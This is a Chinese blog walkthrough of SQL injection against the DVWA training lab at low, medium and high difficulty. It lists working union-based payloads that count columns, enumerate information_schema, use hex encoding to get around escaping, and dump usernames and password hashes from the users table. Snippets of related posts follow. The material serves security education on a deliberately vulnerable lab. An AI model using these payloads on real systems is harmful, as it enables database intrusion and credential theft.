DVWA-SQL注入(Low-High)

最新推荐文章于 2022-09-27 21:16:32 发布
最新推荐文章于 2022-09-27 21:16:32 发布
阅读量1.7k 收藏 11
点赞数 2
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/111223898
版权

DVWA-SQL注入

一、SQL注入概念

SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

二、手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

三、DVWA注入分析

将DVWA的级别设置为low

1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。

 

2.判断sql是否存在存入,以及注入的类型

1' and '1'='1

 

3.猜解SQL查询语句中的字段数

3.1  

1' order by 2#

 

3.2   

1' order by 3#

 

3.3从上面两个图可以说明,SQL语句查询的表的字段数是2。

4.确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2#   

 下图可以看出有2个回显。

 

5.查询当前的数据库,以及版本

1' union select version(),database()#

 

6.获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 

7.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

 

8.获得字段中的数据

1' union select user,password from users#

 

将DVWA的级别设置为Medium

1.分析源码可以看到中级加入了一些防御,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。

 

2.通过burpsuit抓包,修改数据包,绕过防御

2.1判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入。

1 and 1=1

 

2.2猜解sql查询语句中的字段的个数,下图说明字段的个数为2

1 order by 2#

 

1 order by 3#

 

2.3.确定回显的位置,下图可以说明有2个回显位置

1 union select 1,2#

 

2.4.获取当前数据库的名称以及版本

1 union select version(),database()#

 

2.5获取数据库中的所有表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 

2.6获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

提示报错,它对单引号进行了转义

我们可以利用16进制进行绕过

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

 

2.7获取字段中的数据

1 union select user,password from users#

 

将DVWA的级别设置为High

1.将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过。

 

2.判断sql是否存在存入,以及注入的类型

1' and '1'='1

 

3.猜解SQL查询语句中的字段数

1' order by 2#     

 

1' order by 3#     可以看到,SQL语句查询的表的字段数是2。

 

 

4.确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2#

下图可以看出有2个回显

 

5.查询当前的数据库,以及版本

1' union select version(),database()#

 

6.获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 

7.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'# 

 

8.获得字段中的数据

1' union select user,password from users#

 

小陈是个憨憨
关注
DVWA-SQL注入
WY92139010的博客
05-03 965
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWA——SQL注入
最新发布
qq_62803993的博客
01-08 2475
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWASQL注入
RexHa的博客
09-27 2128
DVWA靶场sql注入三个级别通关
DVWA--SQL注入
xiaoxiao的博客
01-07 3459
SQL注入原理 就是通过sql命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SDL命令。具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在WEB表单中输入恶意SQL语句得到包含漏洞的网站数据库,而不是按照设计者意图去执行。 SQL注入类型 按照数据提交的方式: GET注入、POST注入、COOKIE注入、HTTP头部...
DVWA-sql注入
Darklord.W
04-09 373
sql注入低中步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 中: 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 : Hig...
Web安全之DVWA--SQL注入(从低级到级)
w17691058648x的博客
07-04 5773
SQL注入低级(low) 低级核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = ...
DVWA--SQL Injection(SQL注入-非盲注)(全难度)
wwxxee
03-03 381
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
DVWA——sql注入
weixin_44743506的博客
08-22 608
原理 将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的 类型 字符型、数字型、搜索型 过程 1、判断是否存在注入、注入时字符型还是数字型 2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致) 3、确定显示位置(确定在屏幕上显示的结果与select查询列的对应关系,因为某些网页可能会适当调整输出结果的排列顺序,更加美观,但是...
DVWA-SQL注入(SQL Injection)低/中/级别
热门推荐
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
dvwa-sql注入
AI_SumSky的博客
11-27 5833
sql注入 low级别 万能sql语句试一试1’ or '1=1,发现遍历出了全部用户信息 分析源码发现该后台对传入的sql语句没有任何限制和过滤就直接执行,确认存在sql注入漏洞就可以开始摸数据库信息了,或者用工具sqlmap直接莽就完事了 用order by测试字段为2,这是为了后面用union方法,这个方法相关联 的两个查询语句查询参数个数必须相等 由源码函数可知该数据库是mysql可以用级联的方法套数据库信息,1’ union select database(),user()#查看当前数据库和
DVWA(sql注入)
weixin_44023403的博客
12-09 366
DWVA (sql注入SQL注入简介Low SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至执行篡改数据库等操作。 Low 输入1,用burp进行抓包; 将报文头复制,存储到txt文件中,命名为sql.txt; 打开sqlmap,用它去扫描文件,查看返回信息判断该网站是否存在SQL注入漏洞; 打开cmd,输入命令 python sqlmap.py -r "文件存储地址和文件名" --lev
dvwasql注入
BAIXUAN9527的博客
03-27 529
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWA SQL注入
Xiayuyuren_Study的博客
06-21 496
SQL注入漏洞作为OWASP TOP10中重要的一部分 一、原理 通过web程序,在数据库里执行任意SQL语句。根源在于程序命令和用户数据(用户输入)之间没有做到分开。 二、发现 1、确认注入POC (1)检测是否存在注入: 可以得知此处位注入点,尝试输入 ‘ (英文单引号)时,出现如下错误提示: You have an error in your SQL syntax; check t...
DVWA SQL注入
Neko的博客
03-11 210
DVWA SQL注入 安装及下载 dvwa、 插件等 请看上一篇文章 1.首先修改 low 2.SQL注入打开proxy switcher,如此修改 3. 打开Burp页面,关闭intercept 4.清除HTTP历史 输入ID,查看记录 SQL注入 列出所有的库 sqlmap -r 1.txt -dbs -level=3 -risk=3 --batch --proxy http://127.0.0.1:8080 ...
DVWA教程:SQL注入漏洞案例研究
"DVWASQL注入教程" 在2020年12月6日的一篇文章中,作者lll-yz探讨了如何通过DVWA(Damn Vulnerable Web Application)平台进行SQL注入学习。DVWA是一个用于教育和测试Web安全的开源工具,而本文着重于其中的SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值